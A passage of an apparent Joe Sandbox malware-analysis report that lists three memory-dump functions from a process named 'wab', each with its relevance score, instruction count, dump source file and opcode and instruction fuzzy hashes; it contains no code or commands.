                                                                          • Opcode ID: c3c682a376629d8eb18ef611db70a977f0d9121808bf817a30e8befa3f8679fb
                                                                          • Instruction ID: 6a3226e15e14a398e684019a4fee2ccb2d30462a789559919f5e7f6bee01afcc
                                                                          • Opcode Fuzzy Hash: c3c682a376629d8eb18ef611db70a977f0d9121808bf817a30e8befa3f8679fb
                                                                          • Instruction Fuzzy Hash: 5F21F571504644DFEB04DF18D9C0B26BB65FBC8214F24C56DDC094B282CF76D84ACA61
                                                                          Function 02A3D4FB Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b54652409675a8d3f7702fc1b278e370cc506f408a84c7dab7c1d503d06ad02
                                                                          • Instruction ID: 808eaec5edc7c7cd4193bc1071b295184a85da7687c1ffb464f55911c399dad2
                                                                          • Opcode Fuzzy Hash: 7b54652409675a8d3f7702fc1b278e370cc506f408a84c7dab7c1d503d06ad02
                                                                          • Instruction Fuzzy Hash: DE11B176504644CFCB16CF10D5C4B56BF61FB84318F24C5A9E8490B656C336D456CBA2
                                                                          Function 02A3D40F Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575031903.0000000002A3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A3D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a3d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b54652409675a8d3f7702fc1b278e370cc506f408a84c7dab7c1d503d06ad02
                                                                          • Instruction ID: b0e42293fcb7e35742be00dfa7117531cef745624ebecb6e132096161a718ce9
                                                                          • Opcode Fuzzy Hash: 7b54652409675a8d3f7702fc1b278e370cc506f408a84c7dab7c1d503d06ad02
                                                                          • Instruction Fuzzy Hash: B211E676504680DFCF16CF10D5C4B56BF72FB84324F24C5A9E8494B656C33AE456CBA2
                                                                          Function 02A4D0F7 Relevance: .1, Instructions: 53COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000011.00000002.2575334475.0000000002A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A4D000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_17_2_2a4d000_wab.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                          • Instruction ID: 57bd871ca08977ac7c39b0b80da712075e2459352814c61715cac20a2bef0bad
                                                                          • Opcode Fuzzy Hash: 3f4675e99f22990077d7ca64c846758c7cedafdaf71502d2a3914074f32ea8d3
                                                                          • Instruction Fuzzy Hash: 7E11DD75504680CFDB05CF14D9C4B15BBA1FB88318F28C6AADC494B696C73AD44ACB62